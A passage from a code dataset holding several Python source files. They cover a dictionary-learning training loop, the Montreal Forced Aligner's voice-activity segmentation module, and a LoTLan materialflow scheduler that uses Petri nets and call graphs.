copy.deepcopy(D0_reg_layer2)\n train_func2 = MLDLSI2(params,y,atom_n_2)\n for r2 in range(params.max_iter):\n # D1,A_mean1,Dusage1,Uk1,bk1,A1_sum1,y,nonsense=train_func1(r2,False)\n D_sec_layer, A_mean, Dusage, Uk, bk, A1_sum2, y, is_finish = train_func2(r2, True, X_train_first_layer, 0)\n if is_finish:\n break\n\n testparam = Params()\n testparam.lambda1 = params.model.the_lambda\n testparam.lambda2 = 0.04\n A_test = X_test\n output1, output2, output3 = LocalClassifier(A_test, D_sec_layer, A_mean, testparam, Uk, bk, params.model.lambda1)\n # RankingLoss[m]=Ranking_loss(output1,test_Annotation)\n Average_Precision, Average_Precision1 = Average_precision(output1, test_Annotation)\n print()\n print(\"Average_Precision: \" + str(Average_Precision))\n print()\n if Average_Precision>0.78:\n break","repo_name":"zizhouwang/Dictionary-Learning","sub_path":"emldlsi_mul_ADMM_Lagrangian.py","file_name":"emldlsi_mul_ADMM_Lagrangian.py","file_ext":"py","file_size_in_byte":7272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"13981024323","text":"\"\"\"Multiprocessing functionality for VAD\"\"\"\nfrom __future__ import annotations\n\nimport logging\nimport typing\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, List, Union\n\nimport numpy\nimport numpy as np\nimport pynini\nimport pywrapfst\nfrom _kalpy.decoder import LatticeFasterDecoder, LatticeFasterDecoderConfig\nfrom _kalpy.fstext import GetLinearSymbolSequence\nfrom _kalpy.gmm import DecodableAmDiagGmmScaled\nfrom _kalpy.matrix import DoubleMatrix, FloatMatrix\nfrom _kalpy.util import SequentialBaseFloatVectorReader\nfrom kalpy.data import Segment\nfrom kalpy.decoder.training_graphs import TrainingGraphCompiler\nfrom kalpy.feat.cmvn import CmvnComputer\nfrom kalpy.feat.mfcc import MfccComputer\nfrom kalpy.feat.vad import VadComputer\nfrom kalpy.fstext.lexicon import LexiconCompiler\nfrom kalpy.utils import generate_read_specifier, read_kaldi_object\nfrom kalpy.utterance import Utterance as KalpyUtterance\nfrom sqlalchemy.orm import joinedload, subqueryload\n\nfrom montreal_forced_aligner.abc import KaldiFunction\nfrom montreal_forced_aligner.data import CtmInterval, MfaArguments\nfrom montreal_forced_aligner.db import File, Job, Speaker, Utterance\nfrom montreal_forced_aligner.exceptions import SegmenterError\nfrom montreal_forced_aligner.models import AcousticModel, G2PModel\n\ntry:\n import warnings\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n torch_logger = logging.getLogger(\"speechbrain.utils.torch_audio_backend\")\n torch_logger.setLevel(logging.ERROR)\n torch_logger = logging.getLogger(\"speechbrain.utils.train_logger\")\n torch_logger.setLevel(logging.ERROR)\n import torch\n from speechbrain.pretrained import VAD\n\n FOUND_SPEECHBRAIN = True\nexcept (ImportError, OSError):\n FOUND_SPEECHBRAIN = False\n VAD = None\n\nif TYPE_CHECKING:\n SpeakerCharacterType = Union[str, int]\n from dataclasses import dataclass\n\n from montreal_forced_aligner.abc import MetaDict\nelse:\n from dataclassy import dataclass\n\n__all__ = [\n \"SegmentTranscriptArguments\",\n \"SegmentVadArguments\",\n \"SegmentTranscriptFunction\",\n \"SegmentVadFunction\",\n \"get_initial_segmentation\",\n \"merge_segments\",\n \"segment_utterance_transcript\",\n \"segment_utterance_vad\",\n \"segment_utterance_vad_speech_brain\",\n]\n\n\n@dataclass\nclass SegmentVadArguments(MfaArguments):\n \"\"\"Arguments for :class:`~montreal_forced_aligner.segmenter.SegmentVadFunction`\"\"\"\n\n vad_path: Path\n segmentation_options: MetaDict\n\n\n@dataclass\nclass SegmentTranscriptArguments(MfaArguments):\n \"\"\"Arguments for :class:`~montreal_forced_aligner.segmenter.SegmentTranscriptFunction`\"\"\"\n\n acoustic_model: AcousticModel\n vad_model: typing.Optional[VAD]\n lexicon_compilers: typing.Dict[int, LexiconCompiler]\n mfcc_options: MetaDict\n vad_options: MetaDict\n segmentation_options: MetaDict\n decode_options: MetaDict\n\n\ndef segment_utterance_transcript(\n acoustic_model: AcousticModel,\n utterance: KalpyUtterance,\n lexicon_compiler: LexiconCompiler,\n vad_model: VAD,\n segmentation_options: MetaDict,\n cmvn: DoubleMatrix = None,\n fmllr_trans: FloatMatrix = None,\n mfcc_options: MetaDict = None,\n vad_options: MetaDict = None,\n g2p_model: G2PModel = None,\n interjection_words: typing.List[str] = None,\n acoustic_scale: float = 0.1,\n beam: float = 16.0,\n lattice_beam: float = 10.0,\n max_active: int = 7000,\n min_active: int = 200,\n prune_interval: int = 25,\n beam_delta: float = 0.5,\n hash_ratio: float = 2.0,\n prune_scale: float = 0.1,\n boost_silence: float = 1.0,\n):\n \"\"\"\n Split an utterance and its transcript into multiple transcribed utterances\n\n Parameters\n ----------\n acoustic_model: :class:`~montreal_forced_aligner.models.AcousticModel`\n Acoustic model to use in splitting transcriptions\n utterance: :class:`~kalpy.utterance.Utterance`\n Utterance to split\n lexicon_compiler :class:`~kalpy.fstext.lexicon.LexiconCompiler`\n Lexicon compiler\n vad_model :class:`~speechbrain.pretrained.VAD` or None\n VAD model from SpeechBrain, if None, then Kaldi's energy-based VAD is used\n segmentation_options: dict[str, Any]\n Segmentation options\n cmvn: :class:`~_kalpy.matrix.DoubleMatrix`\n CMVN stats to apply\n fmllr_trans: :class:`~_kalpy.matrix.FloatMatrix`\n fMLLR transformation matrix for speaker adaptation\n mfcc_options: dict[str, Any], optional\n MFCC options for energy based VAD\n vad_options: dict[str, Any], optional\n Options for energy based VAD\n acoustic_scale: float, optional\n Defaults to 0.1\n beam: float, optional\n Defaults to 16\n lattice_beam: float, optional\n Defaults to 10\n max_active: int, optional\n Defaults to 7000\n min_active: int, optional\n Defaults to 250\n prune_interval: int, optional\n Defaults to 25\n beam_delta: float, optional\n Defaults to 0.5\n hash_ratio: float, optional\n Defaults to 2.0\n prune_scale: float, optional\n Defaults to 0.1\n boost_silence: float, optional\n Defaults to 1.0\n\n Returns\n -------\n list[:class:`~kalpy.utterance.Utterance`]\n Split utterances\n\n \"\"\"\n graph_compiler = TrainingGraphCompiler(\n acoustic_model.alignment_model_path,\n acoustic_model.tree_path,\n lexicon_compiler,\n lexicon_compiler.word_table,\n )\n if utterance.cmvn_string:\n cmvn = read_kaldi_object(DoubleMatrix, utterance.cmvn_string)\n if utterance.fmllr_string:\n fmllr_trans = read_kaldi_object(FloatMatrix, utterance.fmllr_string)\n if cmvn is None and acoustic_model.uses_cmvn:\n utterance.generate_mfccs(acoustic_model.mfcc_computer)\n cmvn_computer = CmvnComputer()\n cmvn = cmvn_computer.compute_cmvn_from_features([utterance.mfccs])\n current_transcript = utterance.transcript\n if vad_model is None:\n segments = segment_utterance_vad(\n utterance, mfcc_options, vad_options, segmentation_options\n )\n else:\n segments = segment_utterance_vad_speech_brain(utterance, vad_model, segmentation_options)\n\n config = LatticeFasterDecoderConfig()\n config.beam = beam\n config.lattice_beam = lattice_beam\n config.max_active = max_active\n config.min_active = min_active\n config.prune_interval = prune_interval\n config.beam_delta = beam_delta\n config.hash_ratio = hash_ratio\n config.prune_scale = prune_scale\n new_utts = []\n am, transition_model = acoustic_model.acoustic_model, acoustic_model.transition_model\n if boost_silence != 1.0:\n am.boost_silence(transition_model, lexicon_compiler.silence_symbols, boost_silence)\n for seg in segments:\n new_utt = KalpyUtterance(seg, current_transcript)\n new_utt.generate_mfccs(acoustic_model.mfcc_computer)\n if acoustic_model.uses_cmvn:\n new_utt.apply_cmvn(cmvn)\n feats = new_utt.generate_features(\n acoustic_model.mfcc_computer,\n acoustic_model.pitch_computer,\n lda_mat=acoustic_model.lda_mat,\n fmllr_trans=fmllr_trans,\n )\n unknown_words = []\n unknown_word_index = 0\n for w in new_utt.transcript.split():\n if not lexicon_compiler.word_table.member(w):\n unknown_words.append(w)\n fst = graph_compiler.compile_fst(new_utt.transcript, interjection_words)\n decodable = DecodableAmDiagGmmScaled(am, transition_model, feats, acoustic_scale)\n\n d = LatticeFasterDecoder(fst, config)\n ans = d.Decode(decodable)\n if not ans:\n raise SegmenterError(f\"Did not successfully decode: {current_transcript}\")\n ans, decoded = d.GetBestPath()\n if decoded.NumStates() == 0:\n raise SegmenterError(\"Error getting best path from decoder for utterance\")\n alignment, words, weight = GetLinearSymbolSequence(decoded)\n\n words = words[:-1]\n new_transcript = []\n for w in words:\n w = lexicon_compiler.word_table.find(w)\n if w == lexicon_compiler.oov_word:\n w = unknown_words[unknown_word_index]\n unknown_word_index += 1\n new_transcript.append(w)\n transcript = \" \".join(new_transcript)\n if interjection_words:\n current_transcript = align_interjection_words(\n transcript, current_transcript, interjection_words, lexicon_compiler\n )\n else:\n current_transcript = \" \".join(current_transcript.split()[len(words) :])\n new_utt.transcript = transcript\n new_utt.mfccs = None\n new_utt.cmvn_string = utterance.cmvn_string\n new_utt.fmllr_string = utterance.fmllr_string\n new_utts.append(new_utt)\n if current_transcript:\n new_utts[-1].transcript += \" \" + current_transcript\n return new_utts\n\n\ndef align_interjection_words(\n transcript,\n original_transcript,\n interjection_words: typing.List[str],\n lexicon_compiler: LexiconCompiler,\n):\n g = pynini.Fst()\n start_state = g.add_state()\n g.set_start(start_state)\n for w in original_transcript.split():\n word_symbol = lexicon_compiler.to_int(w)\n word_initial_state = g.add_state()\n for iw in interjection_words:\n if not lexicon_compiler.word_table.member(iw):\n continue\n iw_symbol = lexicon_compiler.to_int(iw)\n g.add_arc(\n word_initial_state - 1,\n pywrapfst.Arc(\n iw_symbol,\n lexicon_compiler.word_table.find(\"<eps>\"),\n pywrapfst.Weight(g.weight_type(), 4.0),\n word_initial_state,\n ),\n )\n word_final_state = g.add_state()\n g.add_arc(\n word_initial_state,\n pywrapfst.Arc(\n word_symbol, word_symbol, pywrapfst.Weight.one(g.weight_type()), word_final_state\n ),\n )\n g.add_arc(\n word_initial_state - 1,\n pywrapfst.Arc(\n word_symbol, word_symbol, pywrapfst.Weight.one(g.weight_type()), word_final_state\n ),\n )\n g.set_final(word_initial_state, pywrapfst.Weight.one(g.weight_type()))\n g.set_final(word_final_state, pywrapfst.Weight.one(g.weight_type()))\n\n a = pynini.accep(\n \" \".join(\n [\n x if lexicon_compiler.word_table.member(x) else lexicon_compiler.oov_word\n for x in transcript.split()\n ]\n ),\n token_type=lexicon_compiler.word_table,\n )\n interjections_removed = (\n pynini.compose(a, g).project(\"output\").string(lexicon_compiler.word_table)\n )\n return \" \".join(original_transcript.split()[len(interjections_removed.split()) :])\n\n\ndef get_initial_segmentation(frames: numpy.ndarray, frame_shift: float) -> List[CtmInterval]:\n \"\"\"\n Compute initial segmentation over voice activity\n\n Parameters\n ----------\n frames: list[Union[int, str]]\n List of frames with VAD output\n frame_shift: float\n Frame shift of features in seconds\n\n Returns\n -------\n List[CtmInterval]\n Initial segmentation\n \"\"\"\n segments = []\n cur_segment = None\n silent_frames = 0\n non_silent_frames = 0\n for i in range(frames.shape[0]):\n f = frames[i]\n if int(f) > 0:\n non_silent_frames += 1\n if cur_segment is None:\n cur_segment = CtmInterval(begin=i * frame_shift, end=0, label=\"speech\")\n else:\n silent_frames += 1\n if cur_segment is not None:\n cur_segment.end = (i - 1) * frame_shift\n segments.append(cur_segment)\n cur_segment = None\n if cur_segment is not None:\n cur_segment.end = len(frames) * frame_shift\n segments.append(cur_segment)\n return segments\n\n\ndef merge_segments(\n segments: List[CtmInterval],\n min_pause_duration: float,\n max_segment_length: float,\n min_segment_length: float,\n) -> List[CtmInterval]:\n \"\"\"\n Merge segments together\n\n Parameters\n ----------\n segments: SegmentationType\n Initial segments\n min_pause_duration: float\n Minimum amount of silence time to mark an utterance boundary\n max_segment_length: float\n Maximum length of segments before they're broken up\n min_segment_length: float\n Minimum length of segments returned\n\n Returns\n -------\n List[CtmInterval]\n Merged segments\n \"\"\"\n merged_segments = []\n snap_boundary_threshold = min_pause_duration / 2\n for s in segments:\n if (\n not merged_segments\n or s.begin > merged_segments[-1].end + min_pause_duration\n or s.end - merged_segments[-1].begin > max_segment_length\n ):\n if s.end - s.begin > min_pause_duration:\n if merged_segments and snap_boundary_threshold:\n boundary_gap = s.begin - merged_segments[-1].end\n if boundary_gap < snap_boundary_threshold:\n half_boundary = boundary_gap / 2\n else:\n half_boundary = snap_boundary_threshold / 2\n merged_segments[-1].end += half_boundary\n s.begin -= half_boundary\n\n merged_segments.append(s)\n else:\n merged_segments[-1].end = s.end\n return [x for x in merged_segments if x.end - x.begin > min_segment_length]\n\n\ndef segment_utterance_vad(\n utterance: KalpyUtterance,\n mfcc_options: MetaDict,\n vad_options: MetaDict,\n segmentation_options: MetaDict,\n) -> typing.List[Segment]:\n mfcc_computer = MfccComputer(**mfcc_options)\n vad_computer = VadComputer(**vad_options)\n feats = mfcc_computer.compute_mfccs_for_export(utterance.segment, compress=False)\n vad = vad_computer.compute_vad(feats).numpy()\n segments = get_initial_segmentation(vad, mfcc_computer.frame_shift)\n segments = merge_segments(\n segments,\n segmentation_options[\"close_th\"],\n segmentation_options[\"large_chunk_size\"],\n segmentation_options[\"len_th\"],\n )\n new_segments = []\n for s in segments:\n seg = Segment(\n utterance.segment.file_path,\n s.begin + utterance.segment.begin,\n s.end + utterance.segment.begin,\n utterance.segment.channel,\n )\n new_segments.append(seg)\n return new_segments\n\n\ndef segment_utterance_vad_speech_brain(\n utterance: KalpyUtterance, vad_model: VAD, segmentation_options: MetaDict\n) -> typing.List[Segment]:\n y = utterance.segment.wave\n prob_chunks = vad_model.get_speech_prob_chunk(\n torch.tensor(y[np.newaxis, :], device=vad_model.device)\n ).cpu()\n prob_th = vad_model.apply_threshold(\n prob_chunks,\n activation_th=segmentation_options[\"activation_th\"],\n deactivation_th=segmentation_options[\"deactivation_th\"],\n ).float()\n # Compute the boundaries of the speech segments\n boundaries = vad_model.get_boundaries(prob_th, output_value=\"seconds\")\n boundaries += utterance.segment.begin\n\n # Apply energy-based VAD on the detected speech segments\n if segmentation_options[\"apply_energy_VAD\"]:\n boundaries = vad_model.energy_VAD(\n utterance.segment.file_path,\n boundaries,\n activation_th=segmentation_options[\"en_activation_th\"],\n deactivation_th=segmentation_options[\"en_deactivation_th\"],\n )\n\n # Merge short segments\n boundaries = vad_model.merge_close_segments(\n boundaries, close_th=segmentation_options[\"close_th\"]\n )\n\n # Remove short segments\n boundaries = vad_model.remove_short_segments(boundaries, len_th=segmentation_options[\"len_th\"])\n\n # Double check speech segments\n if segmentation_options[\"double_check\"]:\n boundaries = vad_model.double_check_speech_segments(\n boundaries, utterance.segment.file_path, speech_th=segmentation_options[\"speech_th\"]\n )\n boundaries[:, 0] -= round(segmentation_options[\"close_th\"] / 2, 3)\n boundaries[:, 1] += round(segmentation_options[\"close_th\"] / 2, 3)\n boundaries = boundaries.numpy()\n segments = []\n for i in range(boundaries.shape[0]):\n begin, end = boundaries[i]\n begin = max(begin, 0)\n end = min(end, utterance.segment.end)\n seg = Segment(\n utterance.segment.file_path, float(begin), float(end), utterance.segment.channel\n )\n segments.append(seg)\n return segments\n\n\nclass SegmentVadFunction(KaldiFunction):\n \"\"\"\n Multiprocessing function to generate segments from VAD output.\n\n See Also\n --------\n :meth:`montreal_forced_aligner.segmenter.Segmenter.segment_vad`\n Main function that calls this function in parallel\n :meth:`montreal_forced_aligner.segmenter.VadSegmenter.segment_vad_arguments`\n Job method for generating arguments for this function\n :kaldi_utils:`segmentation.pl`\n Kaldi utility\n\n Parameters\n ----------\n args: :class:`~montreal_forced_aligner.segmenter.SegmentVadArguments`\n Arguments for the function\n \"\"\"\n\n def __init__(self, args: SegmentVadArguments):\n super().__init__(args)\n self.vad_path = args.vad_path\n self.segmentation_options = args.segmentation_options\n\n def _run(self):\n \"\"\"Run the function\"\"\"\n reader = SequentialBaseFloatVectorReader(generate_read_specifier(self.vad_path))\n\n while not reader.Done():\n utt_id = reader.Key()\n frames = reader.Value()\n initial_segments = get_initial_segmentation(\n frames.numpy(), self.segmentation_options[\"frame_shift\"]\n )\n\n merged = merge_segments(\n initial_segments,\n self.segmentation_options[\"close_th\"],\n self.segmentation_options[\"large_chunk_size\"],\n self.segmentation_options[\"len_th\"],\n )\n self.callback((int(utt_id.split(\"-\")[-1]), merged))\n reader.Next()\n reader.Close()\n\n\nclass SegmentTranscriptFunction(KaldiFunction):\n \"\"\"\n Multiprocessing function to segment utterances with transcripts from VAD output.\n\n See Also\n --------\n :meth:`montreal_forced_aligner.segmenter.Segmenter.segment_vad`\n Main function that calls this function in parallel\n :meth:`montreal_forced_aligner.segmenter.TranscriptionSegmenter.segment_transcript_arguments`\n Job method for generating arguments for this function\n :kaldi_utils:`segmentation.pl`\n Kaldi utility\n\n Parameters\n ----------\n args: :class:`~montreal_forced_aligner.segmenter.SegmentTranscriptArguments`\n Arguments for the function\n \"\"\"\n\n def __init__(self, args: SegmentTranscriptArguments):\n super().__init__(args)\n self.acoustic_model = args.acoustic_model\n self.vad_model = args.vad_model\n self.lexicon_compilers = args.lexicon_compilers\n self.segmentation_options = args.segmentation_options\n self.mfcc_options = args.mfcc_options\n self.vad_options = args.vad_options\n self.decode_options = args.decode_options\n self.speechbrain = self.vad_model is not None\n\n def _run(self):\n \"\"\"Run the function\"\"\"\n with self.session() as session:\n job: Job = (\n session.query(Job)\n .options(joinedload(Job.corpus, innerjoin=True), subqueryload(Job.dictionaries))\n .filter(Job.id == self.job_name)\n .first()\n )\n\n for d in job.dictionaries:\n utterances = (\n session.query(Utterance)\n .join(Utterance.speaker)\n .options(\n joinedload(Utterance.file).joinedload(File.sound_file),\n joinedload(Utterance.speaker),\n )\n .filter(\n Utterance.job_id == self.job_name,\n Utterance.duration >= 0.1,\n Speaker.dictionary_id == d.id,\n )\n .order_by(Utterance.kaldi_id)\n )\n for u in utterances:\n new_utterances = segment_utterance_transcript(\n self.acoustic_model,\n u.to_kalpy(),\n self.lexicon_compilers[d.id],\n self.vad_model if self.speechbrain else None,\n self.segmentation_options,\n mfcc_options=self.mfcc_options if not self.speechbrain else None,\n vad_options=self.vad_options if not self.speechbrain else None,\n **self.decode_options,\n )\n self.callback((u.id, new_utterances))\n","repo_name":"MontrealCorpusTools/Montreal-Forced-Aligner","sub_path":"montreal_forced_aligner/vad/multiprocessing.py","file_name":"multiprocessing.py","file_ext":"py","file_size_in_byte":21025,"program_lang":"python","lang":"en","doc_type":"code","stars":1099,"dataset":"github-code","pt":"81"} +{"seq_id":"21360229629","text":"\"\"\" Contains Materialflow and MaterialFlowCallbacks class \"\"\"\n\n# standard libraries\nimport uuid\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n# local sources\nfrom lotlan_scheduler.api.event import Event\nfrom lotlan_scheduler.api.transportorder import TransportOrder\n\nfrom lotlan_scheduler.logger.sqlite_logger import SQLiteLogger\n\nfrom lotlan_scheduler.petri_net.logic import PetriNetLogic\n\nfrom lotlan_scheduler.petri_net.generator import PetriNetGenerator\n\n# globals defines\nfrom lotlan_scheduler.defines import PetriNetConstants, LogicConstants\n\nclass MaterialFlowCallbacks(object):\n \"\"\"\n Contains lists of registered callback functions\n for different states in the scheduling process\n \"\"\"\n def __init__(self):\n self.triggered_by_cb = []\n self.pickup_finished_cb = []\n self.delivery_finished_cb = []\n self.finished_by_cb = []\n self.next_to_cb = []\n self.task_finished_cb = []\n self.all_finished_cb = []\n\nclass MaterialFlow():\n \"\"\" Represents an abstract materialflow \"\"\"\n\n def __init__(self, _uuid, lotlan_structure, lotlan_string, tasks_in_mf, test_flag=False):\n self._uuid = _uuid\n self.name = \"\"\n self._is_running = True\n self.materialflow_callbacks = MaterialFlowCallbacks()\n self.tasks_in_mf = tasks_in_mf\n self.lotlan_structure = lotlan_structure\n self.tasks = {}\n self.ids = {}\n self.triggered_by_events = {}\n self.finished_by_events = {}\n self.event_instances = {}\n self.not_done_parents = {} # 0 if all parent tasks are done\n self.tasks_done = {}\n self.test_flag = test_flag\n self.parent_count = {}\n self.lotlan_string = lotlan_string\n self.petri_net_generator = PetriNetGenerator(tasks_in_mf,\n self.event_instances,\n test_flag=test_flag)\n self.logger = None\n self.call_graph = None\n self.startable_tasks = None\n self.cycle_in_call_graph = None\n self.petri_net_logic = None\n\n def is_running(self):\n return self._is_running\n\n def start(self):\n \"\"\"\n Starts the materialflow scheduling\n \"\"\"\n self.logger = SQLiteLogger()\n self.logger.insert_materialflow_in_sql(self._uuid, self.lotlan_string)\n\n self.initialize_tasks(self.tasks_in_mf)\n\n if self.tasks_in_mf:\n self.name = self.tasks_in_mf[0].name\n\n self.call_graph = self.create_call_graph(self.tasks_in_mf)\n\n cycles = list(nx.simple_cycles(self.call_graph))\n self.cycle_in_call_graph = len(cycles) > 0\n\n self.startable_tasks = self.find_startable_tasks(self.call_graph, self.tasks_in_mf)\n\n for instance in self.lotlan_structure.instances.values():\n if instance.template_name == \"Event\":\n self.event_instances[instance.name] = instance\n task_representations = self.petri_net_generator.generate_task_nets()\n self.petri_net_logic = PetriNetLogic(task_representations, self.test_flag)\n\n self.create_event_information_list()\n self.start_tasks(self.startable_tasks)\n\n def start_tasks(self, tasks):\n \"\"\"\n Starts scheduling of the given tasks\n\n if a task has a triggeredBy statement it waits for incoming events\n otherwise the transport_order can be executed and so next_to is called\n \"\"\"\n next_tos = []\n for task in tasks:\n uuid_ = self.ids[task.name]\n transport_order = task.transport_order\n pickup = transport_order.pickup_tos.location\n delivery = transport_order.delivery_tos.location\n\n transport_order.state = TransportOrder.TransportOrderState.TASK_STARTED\n state = transport_order.state\n self.logger.insert_transport_order(self._uuid, uuid_, state, pickup, delivery)\n\n if self.triggered_by_events[task.name]:\n tb_events_of_task = self.triggered_by_events[task.name]\n self.petri_net_logic.set_awaited_events(task, tb_events_of_task)\n\n self.wait_for_triggered_by(uuid_, self.triggered_by_events[task.name])\n\n transport_order.state = TransportOrder.TransportOrderState.TASK_WAIT_FOR_TRIGGERED_BY\n state = transport_order.state\n self.logger.insert_transport_order(self._uuid, uuid_, state, pickup, delivery)\n else:\n task_started_event = Event(PetriNetConstants.TASK_STARTED_PLACE, \"\", \"Boolean\",\n comparator=\"\", value=True)\n self.petri_net_logic.set_awaited_events(task, [task_started_event])\n self.fire_event(uuid_, task_started_event)\n next_tos.append(task)\n\n self.next_to(next_tos)\n\n def create_call_graph(self, tasks):\n \"\"\"\n Creates a graph where every node is a task\n and a directed edge represents an onDone\n \"\"\"\n call_graph = nx.DiGraph()\n for task in tasks:\n call_graph.add_node(task.name)\n for child in task.on_done:\n call_graph.add_edge(task.name, child)\n return call_graph\n\n def save_call_graph_img(self, filename):\n \"\"\" Saves the generated call graph of the materialflow as image \"\"\"\n nx.draw(self.call_graph, with_labels=True)\n plt.savefig(filename, dpi=300, bbox_inches=\"tight\")\n\n def find_startable_tasks(self, graph, tasks):\n \"\"\"\n Finds tasks that can be started:\n task with no incoming edges in graph\n \"\"\"\n startable_tasks = []\n for task in tasks:\n incoming_edges = 0\n for u, v in graph.in_edges(task.name):\n # ignore self loops\n if u != v:\n incoming_edges = incoming_edges + 1\n else:\n self.not_done_parents[task.name] = 1\n self.not_done_parents[task.name] = self.not_done_parents[task.name] + incoming_edges\n self.parent_count[task.name] = self.not_done_parents[task.name]\n if incoming_edges == 0:\n startable_tasks.append(task)\n\n return startable_tasks\n\n def fire_event(self, uuid_, event):\n \"\"\" Fires event to petri net corresponding to task of uuid \"\"\"\n task = self.tasks[str(uuid_)]\n self.petri_net_logic.fire_event(task, event, self.on_petri_net_response)\n\n def initialize_tasks(self, tasks):\n \"\"\" Adds information for api classes to tasks and init dicts \"\"\"\n for i, task in enumerate(tasks):\n if self.test_flag:\n uuid_ = i\n else:\n uuid_ = uuid.uuid4()\n self.tasks[str(uuid_)] = task\n self.ids[task.name] = uuid_\n self.tasks_done[task.name] = False\n self.not_done_parents[task.name] = 0\n\n transport_order = task.transport_order\n transport_order.uuid = uuid_\n pickup_tos = transport_order.pickup_tos\n delivery_tos = transport_order.delivery_tos\n\n for instance in self.lotlan_structure.instances.values():\n if instance.template_name == \"Location\":\n if pickup_tos.location.logical_name == instance.name:\n pickup_tos.location.physical_name = instance.keyval[\"name\"]\n pickup_tos.location.location_type = instance.keyval[\"type\"]\n elif delivery_tos.location.logical_name == instance.name:\n delivery_tos.location.physical_name = instance.keyval[\"name\"]\n delivery_tos.location.location_type = instance.keyval[\"type\"]\n\n def create_event_information_list(self):\n \"\"\" Creates a list of events objects out of the event names \"\"\"\n for task in self.tasks_in_mf:\n triggered_by = []\n for event_name in task.triggered_by_events:\n logical_name = self.event_instances[event_name].name\n physical_name = self.event_instances[event_name].keyval[\"name\"]\n event_type = self.event_instances[event_name].keyval[\"type\"]\n triggered_by.append(Event(logical_name, physical_name, event_type, None, None))\n self.triggered_by_events[task.name] = triggered_by\n\n finished_by = []\n for event_name in task.finished_by_events:\n logical_name = self.event_instances[event_name].name\n physical_name = self.event_instances[event_name].keyval[\"name\"]\n event_type = self.event_instances[event_name].keyval[\"type\"]\n finished_by.append(Event(logical_name, physical_name, event_type, None, None))\n self.finished_by_events[task.name] = finished_by\n\n def on_petri_net_response(self, msg, task):\n \"\"\"\n Handles incoming messages from the petri net logic and\n calls corresponding methods\n \"\"\"\n if msg == LogicConstants.TRIGGERED_BY_PASSED_MSG:\n self.next_to([task])\n elif msg == LogicConstants.TOS_TB_PASSED_MSG:\n self.on_tos_tb_passed(task)\n elif msg == LogicConstants.TOS_WAIT_FOR_ACTION:\n self.on_tos_wait_for_action(task)\n elif msg == LogicConstants.TOS_FINISHED_MSG:\n self.on_tos_finished(task)\n elif msg == LogicConstants.TO_DONE_MSG:\n self.on_to_done(task)\n elif msg == LogicConstants.TASK_FINISHED_MSG:\n self.on_task_finished(task)\n\n def next_to(self, task_info):\n \"\"\" Notifies listeners about the next transport orders and set petri net state \"\"\"\n if task_info:\n transport_orders = {}\n for task in task_info:\n uid = self.ids[task.name]\n\n transport_order = task.transport_order\n task.transport_order.state = TransportOrder.TransportOrderState.PICKUP_STARTED\n transport_orders[uid] = transport_order\n\n to_done_event = Event(\"to_done\", \"\", \"Boolean\",\n comparator=\"\", value=True)\n\n self.petri_net_logic.set_awaited_events(task, [to_done_event])\n\n self.start_tos(task, transport_order.pickup_tos)\n\n for callback in self.materialflow_callbacks.next_to_cb:\n callback(self._uuid, transport_orders)\n\n def start_tos(self, task, tos, pickup=True):\n \"\"\" Starts scheduling of the given TransportOrderStep \"\"\"\n if tos.triggered_by:\n self.petri_net_logic.set_awaited_events(task, tos.triggered_by)\n\n if pickup:\n task.transport_order.state = TransportOrder.TransportOrderState.PICKUP_WAIT_FOR_TRIGGERED_BY\n else:\n task.transport_order.state = TransportOrder.TransportOrderState.DELIVERY_WAIT_FOR_TRIGGERED_BY\n \n uid = self.ids[task.name]\n self.log_transport_order(uid, task.transport_order)\n else:\n tos_started_event = Event(PetriNetConstants.TOS_STARTED_PLACE, \"\", \"Boolean\", value=True)\n tos_done_event = Event(PetriNetConstants.TOS_MOVED_TO_LOCATION_PLACE, \"\", \"Boolean\", True)\n self.petri_net_logic.set_awaited_events(task, [tos_started_event, tos_done_event])\n self.petri_net_logic.fire_event(task, tos_started_event)\n\n def on_tos_tb_passed(self, task):\n \"\"\"\n Gets called when a TriggeredBy is passed in a TransportOrderStep net.\n Set the petr net state and set new awaited event \"moved_to_location\" for\n either the Pickup Net or the Delivery net depending on the current state\n \"\"\"\n current_state = task.transport_order.state\n uid = self.ids[task.name]\n transport_order = task.transport_order\n\n # check the current state and set the new one\n if current_state == TransportOrder.TransportOrderState.PICKUP_WAIT_FOR_TRIGGERED_BY:\n task.transport_order.state = TransportOrder.TransportOrderState.PICKUP_STARTED\n elif current_state == TransportOrder.TransportOrderState.DELIVERY_WAIT_FOR_TRIGGERED_BY:\n task.transport_order.state = TransportOrder.TransportOrderState.DELIVERY_STARTED\n\n self.log_transport_order(uid, transport_order)\n\n moved_to_locaction_event = Event(\"moved_to_location\", \"\", \"Boolean\", value=True)\n self.petri_net_logic.set_awaited_events(task, [moved_to_locaction_event])\n\n def on_tos_wait_for_action(self, task):\n \"\"\" \n Gets called when the AGV has moved to the Location.\n Set the petri net state and set FinishedBy events as awaited events.\n \"\"\"\n current_state = task.transport_order.state\n tos = None\n uid = self.ids[task.name]\n transport_order = task.transport_order\n\n # check the current state and set the new one\n if current_state == TransportOrder.TransportOrderState.PICKUP_STARTED:\n task.transport_order.state = TransportOrder.TransportOrderState.WAIT_FOR_LOADING\n tos = task.transport_order.pickup_tos\n elif current_state == TransportOrder.TransportOrderState.DELIVERY_STARTED:\n task.transport_order.state = TransportOrder.TransportOrderState.WAIT_FOR_UNLOADING\n tos = task.transport_order.delivery_tos\n else:\n print(\"Something went wrong!\")\n\n self.log_transport_order(uid, transport_order)\n\n self.petri_net_logic.set_awaited_events(task, tos.finished_by)\n\n def on_tos_finished(self, task):\n \"\"\"\n Gets called when a TransportOrderStep is done.\n Set the petri net state and either call on_pickup_finished method\n or on_delivery_finished method depending on the current state\n \"\"\"\n current_state = task.transport_order.state\n uid = self.ids[task.name]\n transport_order = task.transport_order\n\n # check the current state and set the new one\n if current_state == TransportOrder.TransportOrderState.WAIT_FOR_LOADING:\n task.transport_order.state = TransportOrder.TransportOrderState.PICKUP_FINISHED\n self.log_transport_order(uid, transport_order)\n self.on_pickup_finished(task)\n elif current_state == TransportOrder.TransportOrderState.WAIT_FOR_UNLOADING:\n task.transport_order.state = TransportOrder.TransportOrderState.DELIVERY_FINISHED\n self.log_transport_order(uid, transport_order)\n self.on_delivery_finished(task)\n else:\n print(\"Something went wrong!\")\n\n def on_pickup_finished(self, task):\n \"\"\"\n Gets called when the Pickup TransportOrderStep is finished.\n Set petri net state and start Delivery TransportOrderStep\n \"\"\"\n 